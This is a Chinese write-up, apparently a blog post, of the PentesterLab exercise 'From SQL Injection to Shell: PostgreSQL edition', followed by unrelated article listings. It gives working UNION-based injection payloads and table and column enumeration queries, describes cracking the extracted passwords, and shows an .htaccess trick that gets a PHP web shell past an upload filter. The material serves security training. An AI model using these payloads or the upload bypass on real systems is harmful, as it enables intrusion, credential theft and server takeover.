[SQL注入2]FROM SQL INJECTION TO SHELL: POSTGRESQL EDITION

FROM SQL INJECTION TO SHELL: POSTGRESQL EDITION

这里先介绍一下POSTGRESQL。这是一款数据库管理系统，与oracle是同类型软件。08年左右的市场占有率为8%。

[SQL注入2]FROM SQL INJECTION TO SHELL: POSTGRESQL EDITION

上图为ITPUB社区开源数据库使用状况调查

探测SQL注入

本关可以说是FROM SQL INJECTION TO SHELL 这关的延续。建议先通过之前的关。

这关基本上和FROM SQL INJECTION TO SHELL是类似的。共同的部分就不再介绍了。

这关的错误代码发生了变化

[SQL注入2]FROM SQL INJECTION TO SHELL: POSTGRESQL EDITION

利用SQL注入

攻击方法还是用UNION和ORDER BY两种

SELECT id,name,price FROM articles where id=1 UNION SELECT 1,2
SELECT id,name,price FROM articles where id=1 UNION SELECT 1,2,3

这里三种情况都有报错，但第三种情况报的错会不同。报错提示是数据类型不匹配。

[SQL注入2]FROM SQL INJECTION TO SHELL: POSTGRESQL EDITION

再试试ORDER BY。这里很容易试出字段数量。超出查询字段数量，提示如下

[SQL注入2]FROM SQL INJECTION TO SHELL: POSTGRESQL EDITION

检索信息

从上一步的UNION我们看到提示是数据类型不匹配，把数字改变成null试下。

1 UNION SELECT 'aaaa',null,null,null

结果没有报错

我们再尝试下面几种情况

1 UNION SELECT 'aaaa',null,null,null
1 UNION SELECT null,'aaaa',null,null
1 union select null,null,'aaaa',null
1 union select null,null,null,'aaaa'

发现第2和3 个没有报错，第1,4报数据类型不匹配。如果查看网页的HTML，会发现'aaaa'存在于<img中，这可以猜出第3字段应该是与图片的文件名。

[SQL注入2]FROM SQL INJECTION TO SHELL: POSTGRESQL EDITION

我们采用第2个进行构建语句，查询version(),current_user,current_database()

我注意到这里的函数与上一关的略有点不同，上一关的是version(),current_user(),current_database()

这是因为上一关的数据库是MYSQL。

http://www.vulnerable.com/cat.php?id=1%20union%20select%20null,version%28%29,null,null

接下来，我们尝试获取当前数据库的表名和字段。方法和MYSQL的类似。POSTGRESQL也有一个meta-information数据库，我们可以构建语句查询

查询表名：SELECT tablename FROM pg_tables

查询所有字段：

SELECT column_name FROM information_schema.columns

结合到实例中：

1 UNION SELECT null,tablename,null,null FROM pg_tables
1 UNION SELECT null,column_name,null,null FROM information_schema.columns

同时取得字段和对应的表名

1 UNION SELECT null, table_name, column_name,null,null FROM information_schema.columns
1 UNION SELECT null,table_name||':'|| column_name,null,null FROM information_schema.columns.

上一关是用contact函数，而这个数据库不能用。

从结果中找到用户表USERS和它的字段

[SQL注入2]FROM SQL INJECTION TO SHELL: POSTGRESQL EDITION

查出密码再解密还原。

登陆账号，注入文件

这里开始是本关的难点。

上一关用.php3就混过关，这次又被过滤了。经尝试，只要带php的，统统被过滤。

这次要引入 .htaccess文件

这个文件很多妙用，它与windows的autorun.inf有点类似。请查看百度百科

htaccess文件(或者"分布式配置文件"）提供了针对目录改变配置的方法，即，在一个特定的文档目录中放置一个包含一个或多个指令的文件，以作用于此目录及其所有子目录。作为用户，所能使用的命令受到限制。管理员可以通过Apache的AllowOverride指令来设置。

.htaccess文件的内容如下，意思是增加一种php模块执行的后缀。blah后缀不太可能被过滤掉。

[SQL注入2]FROM SQL INJECTION TO SHELL: POSTGRESQL EDITION

特别注意下".htaccess"不是后缀，在windows图形界面下是难重命名成这个名字，需要DOS下改。

[SQL注入2]FROM SQL INJECTION TO SHELL: POSTGRESQL EDITION

再把shell.php3更名为shell.blah，上传这两个到服务器。神奇的事就发生了。

[SQL注入2]FROM SQL INJECTION TO SHELL: POSTGRESQL EDITION

[SQL注入2]FROM SQL INJECTION TO SHELL: POSTGRESQL EDITION的更多相关文章

PentesterLab-From SQL Injection to Shell&colon; PostgreSQL edition
一.打开页面,随便点了几下,返现和From SQL Injection to Shell差不多,直奔主题开始注入由于PostgreSQL与MySQL不同,几个关注点需要注意下二.order by下 ...
[SQL SERVER系列]读书笔记之SQL注入漏洞和SQL调优
最近读了程序员的SQL金典这本书,觉得里面的SQL注入漏洞和SQL调优总结得不错,下面简单讨论下SQL注入漏洞和SQL调优. 1. SQL注入漏洞由于“'1'='1'”这个表达式永远返回 true, ...
读书笔记之SQL注入漏洞和SQL调优
原文:读书笔记之SQL注入漏洞和SQL调优最近读了程序员的SQL金典这本书,觉得里面的SQL注入漏洞和SQL调优总结得不错,下面简单讨论下SQL注入漏洞和SQL调优. 1. SQL注入漏洞由于“' ...
SQL注入漏洞和SQL调优SQL注入漏洞和SQL调优
SQL注入漏洞和SQL调优最近读了程序员的SQL金典这本书,觉得里面的SQL注入漏洞和SQL调优总结得不错,下面简单讨论下SQL注入漏洞和SQL调优. 1. SQL注入漏洞由于“'1'='1'”这 ...
【sql注入教程】SQL注入是什么？我们如何去玩转它
[sql注入教程]SQL注入是什么?我们如何去玩转它本文转自:i春秋社区 SQL注入攻击是黑客攻击数据库最常见手段之一.简单讲,SQL注入攻击是黑客利用网站程序漏洞,通过提交精心构造的SQL语句 ...
[SQL注入1]From SQL injection to Shell
第一次写,希望大神们多指点. 对于刚接触WEB渗透测试这块的朋友们,很希望能有个平台可以练习.网络上有不少,十大渗透测试演练系统,我这里推荐一个在10以外,适合初学者一步一步进步的平台PENTESTE ...
sqli-labs(八)——修改密码处sql注入+http头sql注入
第17关: 这是一个重置密码的功能存在sqk注入,尝试账号密码都输入'",发现只会显示登陆失败,没有报错信息. 这个时候先推测一下后台的sql形式大概应该是: update users se ...
sql注入和防sql注入
sql注入: from pymysql import * def main(): # 创建连接 conn = connect(host="127.0.0.1", port=3306 ...
PHP&colon;测试SQL注入以及防止SQL注入
在写登录注册的时候发现了SQL和JS注入这个危害网站的用户举动: 测试方法: SQL注入: 先来做一个测试: 用户名:’ or 1 # 密码:随便写8位以上验证码:写正确好吧,就那么简单就进去了: ...

随机推荐

[Asp&period;net 5] Localization-简单易用的本地化
本地化也叫国际化,就是做多语言程序时,可以一键式将当前语言切换到另外一种语言.对于跨国企业或者和国外有业务往来的公司特别重要:就算一个普通公司的门户如果支持中.英.繁体,也会让人觉得高大上.有没有呀, ...
eclipse中怎么添加Hibernate tools
最近在学习Hibernate框架,但是用eclipse的时候发现自己安装的过程不是很顺利,因此记下来,供自己和别人参考. Hibernate Tools是由JBoss推出的一个Eclipse集成开发工 ...
Linux监控工具 (Linux Monitor Tools)
最近发现几个好用的工具,顺便总结下. Zabbix和Nagios属于重量级,企业级Service procps-ng: top, free, ps, pgrep, vmstat ... sysstat ...
golang json string remove field
golang中如何移除多余的field? 同样是json结构,不能像js 的json一样 delete key 直接移除,网上找了很多相似的,还没找到解决办法,先mark一下感谢大神提供解决思路,设 ...
Python 统计代码行
正在学习 Python, 做了个统计代码行的功能, 参考了网上很多前辈的帖子,添加了感觉还是比较实用的功能, 只是windows下测试了,而且代码文件编码形式是 utf-8的. 如果使用其它编码形式的 ...
织梦 dedecms 中LOOP 万能标签循环调用 arcurl标签(获取链接)
在DEDECMS中,提供了loop万能循环标签,但是此循环标签只能循环出该表中的字段,而“[field:arcurl/]”链接标签并不能被解析出来,而DEDECMS官方论坛上也没有找到相关的解决办法, ...
zepto源码研究 - deferred&period;js（jquery-deferred&period;js）
简要:zepto的deferred.js 并不遵守promise/A+ 规范,而在jquery v3.0.0中的defer在一定程度上实现了promise/A+ ,因此本文主要研究jquery v3. ...
Caffe学习系列（一）Ubuntu16&period;04下搭建编译Caffe环境，并运行MNIST示例（仅CPU）
前言: 正文: 1.安装必要依赖包: sudo apt-get install libprotobuf-dev libleveldb-dev libsnappy-dev libopencv-dev l ...
51nod 1536不一样的猜数游戏思路：O（n）素数筛选法。同Codeforces 576A Vasya and Petya&&num;39&semi;s Game。
废话不多说,先上题目. 51nod Codeforces 两个其实是一个意思,看51nod题目就讲的很清楚了,题意不再赘述. 直接讲我的分析过程:刚开始拿到手有点蒙蔽,看起来很难,然后......然后 ...
ESP32搭建3&period;ubuntu14&period;04下搭建esp32开发环境（10-5）
硬件为乐鑫出品的ESP32一款集成了wifi和蓝牙的集成模块. 1.首先ctrl+alt+t打开终端,sudo -s选择用root权限登陆 . 2. 输入指令:sudo apt-get install ...